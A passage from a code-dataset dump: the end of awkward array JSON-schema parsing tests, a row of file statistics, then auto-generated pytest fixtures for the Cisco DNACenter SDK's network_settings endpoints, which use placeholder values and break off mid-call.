                "items": {"type": ["integer", "null"]},
            },
        }

    array = from_json_schema(" [ [ 1 ,2,3 ],null,[ ] ,[null, 5]]", schema())
    assert array.tolist() == [[1, 2, 3], None, [], [None, 5]]

    empty = from_json_schema("[]", schema())
    assert empty.tolist() == []
def test_array_array_integer():
    """Three levels of nesting: list of lists of integer lists."""
    inner = {"type": "array", "items": {"type": "integer"}}
    array = ak._v2.operations.convert.from_json_schema(
        " [ [ [ 1 ,2,3 ] ] ,[ [], [4, 5]], []]",
        {"type": "array", "items": {"type": "array", "items": inner}},
    )
    assert array.tolist() == [[[1, 2, 3]], [[], [4, 5]], []]
def test_record():
    """Objects with required integer/number fields become records."""
    from_json_schema = ak._v2.operations.convert.from_json_schema

    def schema():
        return {
            "type": "array",
            "items": {
                "type": "object",
                "properties": {"x": {"type": "integer"}, "y": {"type": "number"}},
                "required": ["x", "y"],
            },
        }

    array = from_json_schema(
        ' [ { "x" :1 ,"y":1.1},{"x": 2, "y": 2.2}, {"x": 3, "y": 3.3}]', schema()
    )
    assert array.tolist() == [
        {"x": 1, "y": 1.1},
        {"x": 2, "y": 2.2},
        {"x": 3, "y": 3.3},
    ]

    empty = from_json_schema("[]", schema())
    assert empty.tolist() == []
def test_option_record():
    """Nullable records: a null element becomes None in the output."""
    from_json_schema = ak._v2.operations.convert.from_json_schema

    def schema():
        return {
            "type": "array",
            "items": {
                "type": ["object", "null"],
                "properties": {"x": {"type": "integer"}, "y": {"type": "number"}},
                "required": ["x", "y"],
            },
        }

    array = from_json_schema(
        ' [ { "x" : 1 ,"y":1.1},null ,{"x": 2, "y": 2.2}, {"x": 3, "y": 3.3}]', schema()
    )
    assert array.tolist() == [
        {"x": 1, "y": 1.1},
        None,
        {"x": 2, "y": 2.2},
        {"x": 3, "y": 3.3},
    ]

    empty = from_json_schema("[]", schema())
    assert empty.tolist() == []
def test_top_record():
    """A top-level (non-array) object parses into a single record."""
    record = ak._v2.operations.convert.from_json_schema(
        ' { "x" :1 ,"y":1.1} ',
        {
            "type": "object",
            "properties": {"y": {"type": "number"}, "x": {"type": "integer"}},
            "required": ["x", "y"],
        },
    )
    assert record.tolist() == {"x": 1, "y": 1.1}
| 30.516129 | 88 | 0.466808 | 1,029 | 9,460 | 4.167153 | 0.082604 | 0.077659 | 0.117537 | 0.134328 | 0.909049 | 0.879431 | 0.860075 | 0.821828 | 0.750466 | 0.720382 | 0 | 0.037273 | 0.302326 | 9,460 | 309 | 89 | 30.614887 | 0.612424 | 0.012474 | 0 | 0.45 | 0 | 0.007692 | 0.222984 | 0 | 0 | 0 | 0 | 0 | 0.161538 | 1 | 0.069231 | false | 0 | 0.015385 | 0 | 0.084615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4db6f19db9e6d27b08fb344ef1087fac2a2020b8 | 32,883 | py | Python | tests/api/v2_2_2_3/test_network_settings.py | oboehmer/dnacentersdk | 25c4e99900640deee91a56aa886874d9cb0ca960 | [
"MIT"
] | 32 | 2019-09-05T05:16:56.000Z | 2022-03-22T09:50:38.000Z | tests/api/v2_2_2_3/test_network_settings.py | oboehmer/dnacentersdk | 25c4e99900640deee91a56aa886874d9cb0ca960 | [
"MIT"
] | 35 | 2019-09-07T18:58:54.000Z | 2022-03-24T19:29:36.000Z | tests/api/v2_2_2_3/test_network_settings.py | oboehmer/dnacentersdk | 25c4e99900640deee91a56aa886874d9cb0ca960 | [
"MIT"
] | 18 | 2019-09-09T11:07:21.000Z | 2022-03-25T08:49:59.000Z | # -*- coding: utf-8 -*-
"""DNACenterAPI network_settings API fixtures and tests.
Copyright (c) 2019-2021 Cisco Systems.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import pytest
from fastjsonschema.exceptions import JsonSchemaException
from dnacentersdk.exceptions import MalformedRequest
from tests.environment import DNA_CENTER_VERSION
pytestmark = pytest.mark.skipif(DNA_CENTER_VERSION != '2.2.2.3', reason='version does not match')
# NOTE(review): machine-generated DNACenter SDK test fixtures — code kept
# byte-for-byte. Per endpoint: is_valid_* validates a response against a pinned
# fastjsonschema id; <endpoint>(api) calls it with every argument populated
# ('string'/0 placeholders), *_default(api) with optional arguments as None;
# each test asserts schema validity and, on failure, re-raises under
# pytest.raises so only the anticipated error types pass (TypeError is also
# tolerated for the _default variants).
def is_valid_assign_credential_to_site(json_schema_validate, obj):
    json_schema_validate('jsd_4e4f91ea42515ccdbc24549b84ca1e90_v2_2_2_3').validate(obj)
    return True
def assign_credential_to_site(api):
    endpoint_result = api.network_settings.assign_credential_to_site(
        active_validation=True,
        cliId='string',
        httpRead='string',
        httpWrite='string',
        payload=None,
        site_id='string',
        snmpV2ReadId='string',
        snmpV2WriteId='string',
        snmpV3Id='string'
    )
    return endpoint_result
@pytest.mark.network_settings
def test_assign_credential_to_site(api, validator):
    try:
        assert is_valid_assign_credential_to_site(
            validator,
            assign_credential_to_site(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def assign_credential_to_site_default(api):
    # site_id stays 'string' even here: it is a required path parameter.
    endpoint_result = api.network_settings.assign_credential_to_site(
        active_validation=True,
        cliId=None,
        httpRead=None,
        httpWrite=None,
        payload=None,
        site_id='string',
        snmpV2ReadId=None,
        snmpV2WriteId=None,
        snmpV3Id=None
    )
    return endpoint_result
@pytest.mark.network_settings
def test_assign_credential_to_site_default(api, validator):
    try:
        assert is_valid_assign_credential_to_site(
            validator,
            assign_credential_to_site_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
def is_valid_create_device_credentials(json_schema_validate, obj):
    json_schema_validate('jsd_903cf2cac6f150c9bee9ade37921b162_v2_2_2_3').validate(obj)
    return True
def create_device_credentials(api):
    # settings mirrors the endpoint's request schema with placeholder values.
    endpoint_result = api.network_settings.create_device_credentials(
        active_validation=True,
        payload=None,
        settings={'cliCredential': [{'description': 'string', 'username': 'string', 'password': 'string', 'enablePassword': 'string'}], 'snmpV2cRead': [{'description': 'string', 'readCommunity': 'string'}], 'snmpV2cWrite': [{'description': 'string', 'writeCommunity': 'string'}], 'snmpV3': [{'description': 'string', 'username': 'string', 'privacyType': 'string', 'privacyPassword': 'string', 'authType': 'string', 'authPassword': 'string', 'snmpMode': 'string'}], 'httpsRead': [{'name': 'string', 'username': 'string', 'password': 'string', 'port': 0}], 'httpsWrite': [{'name': 'string', 'username': 'string', 'password': 'string', 'port': 0}]}
    )
    return endpoint_result
@pytest.mark.network_settings
def test_create_device_credentials(api, validator):
    try:
        assert is_valid_create_device_credentials(
            validator,
            create_device_credentials(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def create_device_credentials_default(api):
    endpoint_result = api.network_settings.create_device_credentials(
        active_validation=True,
        payload=None,
        settings=None
    )
    return endpoint_result
@pytest.mark.network_settings
def test_create_device_credentials_default(api, validator):
    try:
        assert is_valid_create_device_credentials(
            validator,
            create_device_credentials_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
# NOTE(review): generated endpoint fixtures, kept byte-identical. Each cluster:
# pinned-schema validation helper, full-argument call, defaults call, and tests
# that re-raise failures under pytest.raises for the expected error types.
def is_valid_update_device_credentials(json_schema_validate, obj):
    json_schema_validate('jsd_722d7161b33157dba957ba18eda440c2_v2_2_2_3').validate(obj)
    return True
def update_device_credentials(api):
    # Update variant carries an 'id' per credential block (single dicts, not lists).
    endpoint_result = api.network_settings.update_device_credentials(
        active_validation=True,
        payload=None,
        settings={'cliCredential': {'description': 'string', 'username': 'string', 'password': 'string', 'enablePassword': 'string', 'id': 'string'}, 'snmpV2cRead': {'description': 'string', 'readCommunity': 'string', 'id': 'string'}, 'snmpV2cWrite': {'description': 'string', 'writeCommunity': 'string', 'id': 'string'}, 'snmpV3': {'authPassword': 'string', 'authType': 'string', 'snmpMode': 'string', 'privacyPassword': 'string', 'privacyType': 'string', 'username': 'string', 'description': 'string', 'id': 'string'}, 'httpsRead': {'name': 'string', 'username': 'string', 'password': 'string', 'port': 'string', 'id': 'string'}, 'httpsWrite': {'name': 'string', 'username': 'string', 'password': 'string', 'port': 'string', 'id': 'string'}}
    )
    return endpoint_result
@pytest.mark.network_settings
def test_update_device_credentials(api, validator):
    try:
        assert is_valid_update_device_credentials(
            validator,
            update_device_credentials(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def update_device_credentials_default(api):
    endpoint_result = api.network_settings.update_device_credentials(
        active_validation=True,
        payload=None,
        settings=None
    )
    return endpoint_result
@pytest.mark.network_settings
def test_update_device_credentials_default(api, validator):
    try:
        assert is_valid_update_device_credentials(
            validator,
            update_device_credentials_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
def is_valid_get_device_credential_details(json_schema_validate, obj):
    json_schema_validate('jsd_403067d8cf995d9d99bdc31707817456_v2_2_2_3').validate(obj)
    return True
def get_device_credential_details(api):
    endpoint_result = api.network_settings.get_device_credential_details(
        site_id='string'
    )
    return endpoint_result
@pytest.mark.network_settings
def test_get_device_credential_details(api, validator):
    try:
        assert is_valid_get_device_credential_details(
            validator,
            get_device_credential_details(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def get_device_credential_details_default(api):
    endpoint_result = api.network_settings.get_device_credential_details(
        site_id=None
    )
    return endpoint_result
@pytest.mark.network_settings
def test_get_device_credential_details_default(api, validator):
    try:
        assert is_valid_get_device_credential_details(
            validator,
            get_device_credential_details_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
def is_valid_delete_device_credential(json_schema_validate, obj):
    json_schema_validate('jsd_598e8e021f1c51eeaf0d102084481486_v2_2_2_3').validate(obj)
    return True
def delete_device_credential(api):
    endpoint_result = api.network_settings.delete_device_credential(
        id='string'
    )
    return endpoint_result
@pytest.mark.network_settings
def test_delete_device_credential(api, validator):
    try:
        assert is_valid_delete_device_credential(
            validator,
            delete_device_credential(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def delete_device_credential_default(api):
    # 'id' stays 'string' even in the _default variant: required path parameter.
    endpoint_result = api.network_settings.delete_device_credential(
        id='string'
    )
    return endpoint_result
@pytest.mark.network_settings
def test_delete_device_credential_default(api, validator):
    try:
        assert is_valid_delete_device_credential(
            validator,
            delete_device_credential_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
# NOTE(review): generated endpoint fixtures, kept byte-identical. Each cluster:
# pinned-schema validation helper, full-argument call, defaults call, and tests
# that re-raise failures under pytest.raises for the expected error types.
def is_valid_get_global_pool(json_schema_validate, obj):
    json_schema_validate('jsd_ebdcd84fc41754a69eaeacf7c0b0731c_v2_2_2_3').validate(obj)
    return True
def get_global_pool(api):
    endpoint_result = api.network_settings.get_global_pool(
        limit='string',
        offset='string'
    )
    return endpoint_result
@pytest.mark.network_settings
def test_get_global_pool(api, validator):
    try:
        assert is_valid_get_global_pool(
            validator,
            get_global_pool(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def get_global_pool_default(api):
    endpoint_result = api.network_settings.get_global_pool(
        limit=None,
        offset=None
    )
    return endpoint_result
@pytest.mark.network_settings
def test_get_global_pool_default(api, validator):
    try:
        assert is_valid_get_global_pool(
            validator,
            get_global_pool_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
def is_valid_update_global_pool(json_schema_validate, obj):
    json_schema_validate('jsd_5c380301e3e05423bdc1857ff00ae77a_v2_2_2_3').validate(obj)
    return True
def update_global_pool(api):
    endpoint_result = api.network_settings.update_global_pool(
        active_validation=True,
        payload=None,
        settings={'ippool': [{'ipPoolName': 'string', 'gateway': 'string', 'dhcpServerIps': ['string'], 'dnsServerIps': ['string'], 'id': 'string'}]}
    )
    return endpoint_result
@pytest.mark.network_settings
def test_update_global_pool(api, validator):
    try:
        assert is_valid_update_global_pool(
            validator,
            update_global_pool(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def update_global_pool_default(api):
    endpoint_result = api.network_settings.update_global_pool(
        active_validation=True,
        payload=None,
        settings=None
    )
    return endpoint_result
@pytest.mark.network_settings
def test_update_global_pool_default(api, validator):
    try:
        assert is_valid_update_global_pool(
            validator,
            update_global_pool_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
def is_valid_create_global_pool(json_schema_validate, obj):
    json_schema_validate('jsd_eecf4323cb285985be72a7e061891059_v2_2_2_3').validate(obj)
    return True
def create_global_pool(api):
    # Create variant additionally carries type/ipPoolCidr/IpAddressSpace (no id).
    endpoint_result = api.network_settings.create_global_pool(
        active_validation=True,
        payload=None,
        settings={'ippool': [{'ipPoolName': 'string', 'type': 'string', 'ipPoolCidr': 'string', 'gateway': 'string', 'dhcpServerIps': ['string'], 'dnsServerIps': ['string'], 'IpAddressSpace': 'string'}]}
    )
    return endpoint_result
@pytest.mark.network_settings
def test_create_global_pool(api, validator):
    try:
        assert is_valid_create_global_pool(
            validator,
            create_global_pool(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def create_global_pool_default(api):
    endpoint_result = api.network_settings.create_global_pool(
        active_validation=True,
        payload=None,
        settings=None
    )
    return endpoint_result
@pytest.mark.network_settings
def test_create_global_pool_default(api, validator):
    try:
        assert is_valid_create_global_pool(
            validator,
            create_global_pool_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
def is_valid_delete_global_ip_pool(json_schema_validate, obj):
    json_schema_validate('jsd_61f9079863c95acd945c51f728cbf81f_v2_2_2_3').validate(obj)
    return True
def delete_global_ip_pool(api):
    endpoint_result = api.network_settings.delete_global_ip_pool(
        id='string'
    )
    return endpoint_result
@pytest.mark.network_settings
def test_delete_global_ip_pool(api, validator):
    try:
        assert is_valid_delete_global_ip_pool(
            validator,
            delete_global_ip_pool(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def delete_global_ip_pool_default(api):
    # 'id' stays 'string' even in the _default variant: required path parameter.
    endpoint_result = api.network_settings.delete_global_ip_pool(
        id='string'
    )
    return endpoint_result
@pytest.mark.network_settings
def test_delete_global_ip_pool_default(api, validator):
    try:
        assert is_valid_delete_global_ip_pool(
            validator,
            delete_global_ip_pool_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
# NOTE(review): generated endpoint fixtures, kept byte-identical. Each cluster:
# pinned-schema validation helper, full-argument call, defaults call, and tests
# that re-raise failures under pytest.raises for the expected error types.
def is_valid_get_network(json_schema_validate, obj):
    json_schema_validate('jsd_40397b199c175281977a7e9e6bd9255b_v2_2_2_3').validate(obj)
    return True
def get_network(api):
    endpoint_result = api.network_settings.get_network(
        site_id='string'
    )
    return endpoint_result
@pytest.mark.network_settings
def test_get_network(api, validator):
    try:
        assert is_valid_get_network(
            validator,
            get_network(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def get_network_default(api):
    endpoint_result = api.network_settings.get_network(
        site_id=None
    )
    return endpoint_result
@pytest.mark.network_settings
def test_get_network_default(api, validator):
    try:
        assert is_valid_get_network(
            validator,
            get_network_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
def is_valid_create_network(json_schema_validate, obj):
    json_schema_validate('jsd_6eca62ef076b5627a85b2a5959613fb8_v2_2_2_3').validate(obj)
    return True
def create_network(api):
    # settings mirrors the full network-settings request schema (DHCP/DNS/
    # syslog/SNMP/netflow/NTP/banner/AAA) with placeholder values.
    endpoint_result = api.network_settings.create_network(
        active_validation=True,
        payload=None,
        settings={'dhcpServer': ['string'], 'dnsServer': {'domainName': 'string', 'primaryIpAddress': 'string', 'secondaryIpAddress': 'string'}, 'syslogServer': {'ipAddresses': ['string'], 'configureDnacIP': True}, 'snmpServer': {'ipAddresses': ['string'], 'configureDnacIP': True}, 'netflowcollector': {'ipAddress': 'string', 'port': 0}, 'ntpServer': ['string'], 'timezone': 'string', 'messageOfTheday': {'bannerMessage': 'string', 'retainExistingBanner': True}, 'network_aaa': {'servers': 'string', 'ipAddress': 'string', 'network': 'string', 'protocol': 'string', 'sharedSecret': 'string', 'additionalIp': ['string']}, 'clientAndEndpoint_aaa': {'servers': 'string', 'ipAddress': 'string', 'network': 'string', 'protocol': 'string', 'sharedSecret': 'string', 'additionalIp': ['string']}},
        site_id='string'
    )
    return endpoint_result
@pytest.mark.network_settings
def test_create_network(api, validator):
    try:
        assert is_valid_create_network(
            validator,
            create_network(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def create_network_default(api):
    endpoint_result = api.network_settings.create_network(
        active_validation=True,
        payload=None,
        settings=None,
        site_id='string'
    )
    return endpoint_result
@pytest.mark.network_settings
def test_create_network_default(api, validator):
    try:
        assert is_valid_create_network(
            validator,
            create_network_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
def is_valid_update_network(json_schema_validate, obj):
    json_schema_validate('jsd_e1b8c435195d56368c24a54dcce007d0_v2_2_2_3').validate(obj)
    return True
def update_network(api):
    # Same settings payload shape as create_network, different endpoint/schema id.
    endpoint_result = api.network_settings.update_network(
        active_validation=True,
        payload=None,
        settings={'dhcpServer': ['string'], 'dnsServer': {'domainName': 'string', 'primaryIpAddress': 'string', 'secondaryIpAddress': 'string'}, 'syslogServer': {'ipAddresses': ['string'], 'configureDnacIP': True}, 'snmpServer': {'ipAddresses': ['string'], 'configureDnacIP': True}, 'netflowcollector': {'ipAddress': 'string', 'port': 0}, 'ntpServer': ['string'], 'timezone': 'string', 'messageOfTheday': {'bannerMessage': 'string', 'retainExistingBanner': True}, 'network_aaa': {'servers': 'string', 'ipAddress': 'string', 'network': 'string', 'protocol': 'string', 'sharedSecret': 'string', 'additionalIp': ['string']}, 'clientAndEndpoint_aaa': {'servers': 'string', 'ipAddress': 'string', 'network': 'string', 'protocol': 'string', 'sharedSecret': 'string', 'additionalIp': ['string']}},
        site_id='string'
    )
    return endpoint_result
@pytest.mark.network_settings
def test_update_network(api, validator):
    try:
        assert is_valid_update_network(
            validator,
            update_network(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def update_network_default(api):
    endpoint_result = api.network_settings.update_network(
        active_validation=True,
        payload=None,
        settings=None,
        site_id='string'
    )
    return endpoint_result
@pytest.mark.network_settings
def test_update_network_default(api, validator):
    try:
        assert is_valid_update_network(
            validator,
            update_network_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
# NOTE(review): generated endpoint fixtures, kept byte-identical. Each cluster:
# pinned-schema validation helper, full-argument call, defaults call, and tests
# that re-raise failures under pytest.raises for the expected error types.
def is_valid_get_reserve_ip_subpool(json_schema_validate, obj):
    json_schema_validate('jsd_274851d84253559e9d3e81881a4bd2fc_v2_2_2_3').validate(obj)
    return True
def get_reserve_ip_subpool(api):
    endpoint_result = api.network_settings.get_reserve_ip_subpool(
        limit='string',
        offset='string',
        site_id='string'
    )
    return endpoint_result
@pytest.mark.network_settings
def test_get_reserve_ip_subpool(api, validator):
    try:
        assert is_valid_get_reserve_ip_subpool(
            validator,
            get_reserve_ip_subpool(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def get_reserve_ip_subpool_default(api):
    endpoint_result = api.network_settings.get_reserve_ip_subpool(
        limit=None,
        offset=None,
        site_id=None
    )
    return endpoint_result
@pytest.mark.network_settings
def test_get_reserve_ip_subpool_default(api, validator):
    try:
        assert is_valid_get_reserve_ip_subpool(
            validator,
            get_reserve_ip_subpool_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
def is_valid_release_reserve_ip_subpool(json_schema_validate, obj):
    json_schema_validate('jsd_eabbb425255a57578e9db00cda1f303a_v2_2_2_3').validate(obj)
    return True
def release_reserve_ip_subpool(api):
    endpoint_result = api.network_settings.release_reserve_ip_subpool(
        id='string'
    )
    return endpoint_result
@pytest.mark.network_settings
def test_release_reserve_ip_subpool(api, validator):
    try:
        assert is_valid_release_reserve_ip_subpool(
            validator,
            release_reserve_ip_subpool(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def release_reserve_ip_subpool_default(api):
    # 'id' stays 'string' even in the _default variant: required path parameter.
    endpoint_result = api.network_settings.release_reserve_ip_subpool(
        id='string'
    )
    return endpoint_result
@pytest.mark.network_settings
def test_release_reserve_ip_subpool_default(api, validator):
    try:
        assert is_valid_release_reserve_ip_subpool(
            validator,
            release_reserve_ip_subpool_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
def is_valid_reserve_ip_subpool(json_schema_validate, obj):
    json_schema_validate('jsd_700808cec6c85d9bb4bcc8f61f31296b_v2_2_2_3').validate(obj)
    return True
def reserve_ip_subpool(api):
    # Full IPv4/IPv6 reservation payload with placeholder values for every field.
    endpoint_result = api.network_settings.reserve_ip_subpool(
        active_validation=True,
        ipv4DhcpServers=['string'],
        ipv4DnsServers=['string'],
        ipv4GateWay='string',
        ipv4GlobalPool='string',
        ipv4Prefix=True,
        ipv4PrefixLength=0,
        ipv4Subnet='string',
        ipv4TotalHost=0,
        ipv6AddressSpace=True,
        ipv6DhcpServers=['string'],
        ipv6DnsServers=['string'],
        ipv6GateWay='string',
        ipv6GlobalPool='string',
        ipv6Prefix=True,
        ipv6PrefixLength=0,
        ipv6Subnet='string',
        ipv6TotalHost=0,
        name='string',
        payload=None,
        site_id='string',
        slaacSupport=True,
        type='string'
    )
    return endpoint_result
@pytest.mark.network_settings
def test_reserve_ip_subpool(api, validator):
    try:
        assert is_valid_reserve_ip_subpool(
            validator,
            reserve_ip_subpool(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def reserve_ip_subpool_default(api):
    endpoint_result = api.network_settings.reserve_ip_subpool(
        active_validation=True,
        ipv4DhcpServers=None,
        ipv4DnsServers=None,
        ipv4GateWay=None,
        ipv4GlobalPool=None,
        ipv4Prefix=None,
        ipv4PrefixLength=None,
        ipv4Subnet=None,
        ipv4TotalHost=None,
        ipv6AddressSpace=None,
        ipv6DhcpServers=None,
        ipv6DnsServers=None,
        ipv6GateWay=None,
        ipv6GlobalPool=None,
        ipv6Prefix=None,
        ipv6PrefixLength=None,
        ipv6Subnet=None,
        ipv6TotalHost=None,
        name=None,
        payload=None,
        site_id='string',
        slaacSupport=None,
        type=None
    )
    return endpoint_result
@pytest.mark.network_settings
def test_reserve_ip_subpool_default(api, validator):
    try:
        assert is_valid_reserve_ip_subpool(
            validator,
            reserve_ip_subpool_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
# NOTE(review): generated endpoint fixtures, kept byte-identical. Cluster:
# pinned-schema validation helper, full-argument call, defaults call, and tests
# that re-raise failures under pytest.raises for the expected error types.
def is_valid_update_reserve_ip_subpool(json_schema_validate, obj):
    json_schema_validate('jsd_07fd6083b0c65d03b2d53f10b3ece59d_v2_2_2_3').validate(obj)
    return True
def update_reserve_ip_subpool(api):
    # Update variant: identified by 'id'; IPv4 subnet fields are not updatable here.
    endpoint_result = api.network_settings.update_reserve_ip_subpool(
        active_validation=True,
        id='string',
        ipv4DhcpServers=['string'],
        ipv4DnsServers=['string'],
        ipv6AddressSpace=True,
        ipv6DhcpServers=['string'],
        ipv6DnsServers=['string'],
        ipv6GateWay='string',
        ipv6GlobalPool='string',
        ipv6Prefix=True,
        ipv6PrefixLength=0,
        ipv6Subnet='string',
        ipv6TotalHost=0,
        name='string',
        payload=None,
        site_id='string',
        slaacSupport=True
    )
    return endpoint_result
@pytest.mark.network_settings
def test_update_reserve_ip_subpool(api, validator):
    try:
        assert is_valid_update_reserve_ip_subpool(
            validator,
            update_reserve_ip_subpool(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def update_reserve_ip_subpool_default(api):
    endpoint_result = api.network_settings.update_reserve_ip_subpool(
        active_validation=True,
        id=None,
        ipv4DhcpServers=None,
        ipv4DnsServers=None,
        ipv6AddressSpace=None,
        ipv6DhcpServers=None,
        ipv6DnsServers=None,
        ipv6GateWay=None,
        ipv6GlobalPool=None,
        ipv6Prefix=None,
        ipv6PrefixLength=None,
        ipv6Subnet=None,
        ipv6TotalHost=None,
        name=None,
        payload=None,
        site_id='string',
        slaacSupport=None
    )
    return endpoint_result
@pytest.mark.network_settings
def test_update_reserve_ip_subpool_default(api, validator):
    try:
        assert is_valid_update_reserve_ip_subpool(
            validator,
            update_reserve_ip_subpool_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
def is_valid_get_service_provider_details(json_schema_validate, obj):
json_schema_validate('jsd_69dda850a0675b888048adf8d488aec1_v2_2_2_3').validate(obj)
return True
def get_service_provider_details(api):
endpoint_result = api.network_settings.get_service_provider_details(
)
return endpoint_result
@pytest.mark.network_settings
def test_get_service_provider_details(api, validator):
try:
assert is_valid_get_service_provider_details(
validator,
get_service_provider_details(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def get_service_provider_details_default(api):
    """Default-parameter variant: fetch service provider details with no arguments."""
    return api.network_settings.get_service_provider_details()
@pytest.mark.network_settings
def test_get_service_provider_details_default(api, validator):
    """Fetch service provider details (default variant) and validate the response."""
    try:
        assert is_valid_get_service_provider_details(
            validator,
            get_service_provider_details_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
def is_valid_create_sp_profile(json_schema_validate, obj):
    """Validate obj against the create_sp_profile response schema.

    Returns True when validation passes; the validator raises otherwise.
    """
    schema = json_schema_validate('jsd_1ffa347eb411567a9c793696795250a5_v2_2_2_3')
    schema.validate(obj)
    return True
def create_sp_profile(api):
    """Create an SP profile with a sample QoS settings block."""
    qos_entry = {'profileName': 'string', 'model': 'string', 'wanProvider': 'string'}
    return api.network_settings.create_sp_profile(
        active_validation=True,
        payload=None,
        settings={'qos': [qos_entry]},
    )
@pytest.mark.network_settings
def test_create_sp_profile(api, validator):
    """Create an SP profile and validate the response schema."""
    try:
        assert is_valid_create_sp_profile(
            validator,
            create_sp_profile(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def create_sp_profile_default(api):
    """Default-parameter variant: create an SP profile with settings=None."""
    request_kwargs = dict(active_validation=True, payload=None, settings=None)
    return api.network_settings.create_sp_profile(**request_kwargs)
@pytest.mark.network_settings
def test_create_sp_profile_default(api, validator):
    """Create an SP profile with default (None) settings and validate the response."""
    try:
        assert is_valid_create_sp_profile(
            validator,
            create_sp_profile_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
def is_valid_update_sp_profile(json_schema_validate, obj):
    """Validate obj against the update_sp_profile response schema.

    Returns True when validation passes; the validator raises otherwise.
    """
    schema = json_schema_validate('jsd_03e22c99a82f5764828810acb45e7a9e_v2_2_2_3')
    schema.validate(obj)
    return True
def update_sp_profile(api):
    """Update an SP profile, including the oldProfileName rename field."""
    qos_entry = {
        'profileName': 'string',
        'model': 'string',
        'wanProvider': 'string',
        'oldProfileName': 'string',
    }
    return api.network_settings.update_sp_profile(
        active_validation=True,
        payload=None,
